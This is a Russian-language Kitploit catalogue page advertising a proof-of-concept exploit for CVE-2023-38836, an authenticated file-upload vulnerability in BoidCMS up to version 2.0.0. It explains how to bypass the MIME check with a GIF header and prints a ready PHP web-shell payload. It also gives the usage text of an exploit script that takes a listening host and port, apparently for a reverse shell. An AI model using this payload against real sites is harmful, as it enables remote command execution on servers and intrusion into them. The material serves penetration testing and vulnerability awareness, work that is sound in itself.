Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38836 — PoC-эксплойт для уязвимости загрузки файлов в BoidCMS версии <=2.0.0 | Kitploit
Инструменты/GitHubGitHub/1337kid/cve-2023-38836
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHub1337kid/cve-2023-38836

CVE-2023-38836

PoC-эксплойт для уязвимости загрузки файлов в BoidCMS версии <=2.0.0

Репозиторий
512 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-38836 Эксплойт

Уязвимость загрузки файлов в BoidCMS v.2.0.0 позволяет аутентифицированному атакующему загрузить файл опасного типа (CWE-434).
Для эксплуатации атакующий может добавить GIF-заголовок, чтобы обойти проверки MIME-типа.

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

Использование

root@kitploit:~
использование: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Эксплойт для CVE-2023-38836

опции:
  -h, --help            показать это справочное сообщение и выйти
  -u URL, --url URL     URL веб-сайта
  -U USER, --user USER  имя пользователя администратора
  -P PASSWD, --passwd PASSWD
                        пароль администратора
  -l LHOST, --lhost LHOST
                        прослушивающий хост
  -p LPORT, --lport LPORT
                        прослушивающий порт

Скачать инструмент